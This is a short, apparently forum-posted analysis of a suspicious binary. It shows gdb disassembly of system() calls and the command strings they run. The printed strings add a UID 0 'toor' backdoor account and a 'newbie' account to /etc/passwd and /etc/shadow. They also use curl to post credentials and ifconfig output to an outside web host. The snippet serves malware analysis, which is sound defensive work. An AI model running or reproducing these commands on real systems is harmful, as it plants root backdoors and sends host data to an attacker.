When disassembling, these are the things to look for, note the system calls:
Code:
0x08048feb <main+262>: call 0x8048628 <system@plt>
0x08048ff0 <main+267>: movl $0x8049534,(%esp)
0x08048ff7 <main+274>: call 0x8048628 <system@plt>
0x08048ffc <main+279>: movl $0x8049588,(%esp)
0x08049003 <main+286>: call 0x8048628 <system@plt>
0x08049008 <main+291>: movl $0x80495bc,(%esp)
0x0804900f <main+298>: call 0x8048628 <system@plt>
0x08049014 <main+303>: movl $0x8049468,0x4(%esp)
And now, what they do:
Code:
(gdb) x/s 0x80495bc
0x80495bc <__dso_handle+1036>: "echo newbie:x:10000:65534:toor:/var/tmp:/bin/sh >> /etc/passwd"
(gdb) x/s 0x8049534
0x8049534 <__dso_handle+900>: "echo newbie:\\$1\\$nLv4Q0aJ\\$rV4IkBgFH1NMo\\/HzHX35u/:13531:0:99999:7:::>>/etc/shadow"
(gdb) x/s 0x8049588
0x8049588 <__dso_handle+984>: "echo toor:x:0:0:toor:/var:/bin/sh >> /etc/passwd"
(gdb) x/s 0x80495bc
0x80495bc <__dso_handle+1036>: "echo newbie:x:10000:65534:toor:/var/tmp:/bin/sh >> /etc/passwd"
(gdb) x/s 0x804960c
0x804960c <__dso_handle+1116>: "/usr/bin/curl -d \"user=newbie&pass=novice&target=$(ifconfig -a)\" http://www.trancefix.org/hell/save.php > /dev/null 2&>/dev/null"